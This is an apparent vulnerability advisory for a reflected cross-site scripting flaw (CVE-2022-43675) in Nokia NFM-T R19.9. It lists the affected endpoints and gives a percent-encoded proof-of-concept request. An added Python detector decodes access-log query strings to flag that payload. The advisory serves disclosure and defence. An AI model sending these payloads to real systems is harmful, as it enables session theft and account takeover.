CVE-2022-43675

CVE-2022-43675 – NOKIA NFM-T Network Element Manager

Vulnerability Description: Improper Neutralization of Input During Web Page Generation ('Reflected Cross-site Scripting') – CWE-79

Software Version: R19.9

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-43675

CVSSv3: 6.1

Severity: Medium

Credits: Luca Di Giuseppe, Alessandro Bosco, Stefano Scipioni, Massimiliano Brolli

Multiple reflected cross-site scripting (XSS) vulnerabilities allow unauthenticated remote attackers to inject arbitrary web script or HTML through HTTP GET parameters whose values are reflected without sanitization.

Step-by-step instructions and PoC

Reflected cross-site scripting (XSS) allows unauthenticated remote attackers to inject arbitrary web script or HTML through HTTP GET parameters whose values are reflected without sanitization. This type of vulnerability was found on numerous web application endpoints; only a few are listed here for demonstration purposes.

Affected Endpoints

· URL: https://<host>/oms1350/pages/otn/cpbLogDisplay?filename=
  o HTTP GET Parameter: filename
· URL: https://<host>/oms1350/pages/otn/connection/E2ERoutingDisplayWithOverLay?id=174&connectionName=
  o HTTP GET Parameter: id
· URL: https://<host>/oms1350/pages/otn/mainOtn?menuItem=items&fromReactUI=FALSE&component=npr&resource=nes&id=101&callback=callback
  o HTTP GET Parameter: all parameters

Payload used to exploit the vulnerability. All payloads must be URL-encoded in order to exploit it:

GET /oms1350/pages/otn/cpbLogDisplay?filename=%3c%2f%73%63%72%69%70%74%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e
Cookie: JSESSIONID=; NSPOS_JSESSIONID=
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0

Security Impact

Successful exploitation of this vulnerability can result in unauthorized access to critical data or complete account takeover.
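
The request shown in the PoC is percent-encoded character by character, so a literal search for `<script` in web server logs does not match it. The following log check is an added example, not part of the original advisory or of the vendor's code: it decodes the query string of requests to the endpoints listed above and reports parameters that decode to markup. It assumes a combined-format access log and that legitimate values for these parameters never contain markup or quote characters; the sample log lines are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Endpoint paths named in the advisory.
AFFECTED_PATHS = {
    "/oms1350/pages/otn/cpbLogDisplay",
    "/oms1350/pages/otn/connection/E2ERoutingDisplayWithOverLay",
    "/oms1350/pages/otn/mainOtn",
}
# Assumption: legitimate values for these parameters never contain markup or quotes.
MARKUP = re.compile("[<>\"']")
# Request field of a combined-format access log line (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def normalise(value, rounds=2):
    """Strip up to `rounds` further layers of percent-encoding."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(target):
    """Return [(name, decoded_value)] for parameters that decode to markup."""
    parts = urlsplit(target)
    if parts.path not in AFFECTED_PATHS:
        return []
    pairs = parse_qsl(parts.query, keep_blank_values=True)  # decodes one layer
    decoded = [(name, normalise(value)) for name, value in pairs]
    return [(n, v) for n, v in decoded if MARKUP.search(n) or MARKUP.search(v)]

def scan(log_lines):
    """Return [(line_number, parameter, decoded_value)] across an access log."""
    findings = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if match:
            findings += [(number, n, v) for n, v in suspicious_params(match.group(1))]
    return findings

# Constructed sample log: line 1 carries the advisory's fully percent-encoded request.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2023:10:00:00 +0000] "GET /oms1350/pages/otn/cpbLogDisplay?filename=%3c%2f%73%63%72%69%70%74%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e HTTP/1.1" 200 512',
    '198.51.100.8 - - [01/Jan/2023:10:00:05 +0000] "GET /oms1350/pages/otn/mainOtn?menuItem=items&fromReactUI=FALSE&component=npr&resource=nes&id=101&callback=callback HTTP/1.1" 200 2048',
    '198.51.100.9 - - [01/Jan/2023:10:00:09 +0000] "GET /oms1350/pages/otn/connection/E2ERoutingDisplayWithOverLay?id=%253Cb%253E&connectionName=x HTTP/1.1" 200 900',
]
if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

Line 3 of the sample is double-encoded, which is why the check decodes more than one layer before matching.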